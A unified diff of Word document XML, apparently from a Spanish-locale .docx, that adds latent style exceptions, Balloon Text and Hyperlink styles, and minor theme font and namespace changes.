+    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
+    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
   </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
+    <w:rsid w:val="00756165"/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Ttulo1">
     <w:name w:val="heading 1"/>
@@ -5028,6 +6058,7 @@
   <w:style w:type="character" w:default="1" w:styleId="Fuentedeprrafopredeter">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="Tablanormal">
@@ -5035,6 +6066,7 @@
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
+    <w:qFormat/>
     <w:tblPr>
       <w:tblInd w:w="0" w:type="dxa"/>
       <w:tblCellMar>
@@ -5341,6 +6373,47 @@
       <w:spacing w:val="5"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Textodeglobo">
+    <w:name w:val="Balloon Text"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="TextodegloboCar"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00395F25"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+      <w:sz w:val="16"/>
+      <w:szCs w:val="16"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="TextodegloboCar">
+    <w:name w:val="Texto de globo Car"/>
+    <w:basedOn w:val="Fuentedeprrafopredeter"/>
+    <w:link w:val="Textodeglobo"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00395F25"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+      <w:sz w:val="16"/>
+      <w:szCs w:val="16"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Hipervnculo">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="Fuentedeprrafopredeter"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00C628DB"/>
+    <w:rPr>
+      <w:color w:val="467886" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -5387,7 +6460,7 @@
     </a:clrScheme>
     <a:fontScheme name="Office">
       <a:majorFont>
-        <a:latin typeface="Aptos Display" panose="02110004020202020204"/>
+        <a:latin typeface="Aptos Display"/>
         <a:ea typeface=""/>
         <a:cs typeface=""/>
         <a:font script="Jpan" typeface="游ゴシック Light"/>
@@ -5439,7 +6512,7 @@
         <a:font script="Tfng" typeface="Ebrima"/>
       </a:majorFont>
       <a:minorFont>
-        <a:latin typeface="Aptos" panose="02110004020202020204"/>
+        <a:latin typeface="Aptos"/>
         <a:ea typeface=""/>
         <a:cs typeface=""/>
         <a:font script="Jpan" typeface="游明朝"/>
@@ -5633,7 +6706,7 @@
   <a:extraClrSchemeLst/>
   <a:extLst>
     <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
-      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="Office Theme" id="{2E142A2C-CD16-42D6-873A-C26D2A0506FA}" vid="{1BDDFF52-6CD6-40A5-AB3C-68EB2F1E4D0A}"/>
+      <thm15:themeFamily xmlns="" xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="Office Theme" id="{2E142A2C-CD16-42D6-873A-C26D2A0506FA}" vid="{1BDDFF52-6CD6-40A5-AB3C-68EB2F1E4D0A}"/>
     </a:ext>
   </a:extLst>
 </a:theme>
